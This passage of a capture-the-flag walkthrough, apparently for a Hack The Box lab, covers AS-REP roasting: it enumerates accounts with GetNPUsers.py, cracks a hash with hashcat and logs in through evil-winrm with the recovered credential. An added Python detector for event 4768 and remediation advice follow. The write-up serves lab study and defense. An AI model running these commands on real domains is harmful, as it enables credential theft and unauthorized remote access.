Foothold

AS-REP Roasting

The previous enumeration gave us a list of valid usernames, so we can now check whether any of those users have Kerberos pre-authentication disabled.

for user in $(cat users); do GetNPUsers.py -no-pass -dc-ip 10.10.10.161 htb/${user} | grep -v Impacket; done

We get a hit: user svc-alfresco

We crack the hash for this user and get our first credential pair:

hashcat -m 18200 svc_alfresc /usr/share/wordlists/rockyou.txt.gz
svc-alfresco:s3rvice
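
On the domain controller, a TGT handed out this way is logged as event 4768 with PreAuthType 0, and the RC4 reply (etype 0x17) is what hashcat mode 18200 works on. The Python below is an added example, not part of the original writeup, that flags such events; the field names follow the 4768 EventData layout, while the sample events, the users other than svc-alfresco and the 192.0.2.x addresses are constructed.

```python
import xml.etree.ElementTree as ET

NS = {"e": "http://schemas.microsoft.com/win/2004/08/events/event"}
RC4_HMAC = "0x17"  # etype 23, the AS-REP type hashcat mode 18200 targets

def make_event(user, status, etype, preauth, ip):
    """Build a trimmed 4768 record. Constructed sample data, not a real log."""
    data = {"TargetUserName": user, "Status": status,
            "TicketEncryptionType": etype, "PreAuthType": preauth, "IpAddress": ip}
    fields = "".join(f'<Data Name="{k}">{v}</Data>' for k, v in data.items())
    return (f'<Event xmlns="{NS["e"]}"><System><EventID>4768</EventID></System>'
            f"<EventData>{fields}</EventData></Event>")

# Constructed events: two normal logons, one request for an unknown user,
# and one TGT issued without pre-authentication.
SAMPLE_EVENTS = [
    make_event("alice", "0x0", "0x12", "2", "::ffff:192.0.2.20"),
    make_event("nosuchuser", "0x6", "0xffffffff", "-", "::ffff:192.0.2.50"),
    make_event("svc-alfresco", "0x0", "0x17", "0", "::ffff:192.0.2.50"),
    make_event("bob", "0x0", "0x12", "2", "::ffff:192.0.2.21"),
]

def parse_4768(xml_text):
    """Return the EventData fields of a 4768 record, or None for other events."""
    root = ET.fromstring(xml_text)
    if root.findtext("e:System/e:EventID", namespaces=NS) != "4768":
        return None
    return {d.get("Name"): d.text or "" for d in root.iterfind("e:EventData/e:Data", NS)}

def find_preauth_less_tgts(events):
    """Flag successful TGT requests that were answered without pre-authentication."""
    alerts = []
    for xml_text in events:
        fields = parse_4768(xml_text)
        if not fields or fields.get("Status") != "0x0" or fields.get("PreAuthType") != "0":
            continue
        alerts.append({
            "user": fields["TargetUserName"],
            "source": fields["IpAddress"].replace("::ffff:", "", 1),
            # RC4 replies are the cheapest to crack offline, so rank them higher
            "severity": "high" if fields["TicketEncryptionType"].lower() == RC4_HMAC else "medium",
        })
    return alerts

if __name__ == "__main__":
    for alert in find_preauth_less_tgts(SAMPLE_EVENTS):
        print(alert)
```

Re-enabling pre-authentication on the flagged account (clearing "Do not require Kerberos preauthentication") removes the exposure; a long random password limits it where the flag has to stay.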

And with that we get our foothold:

evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161
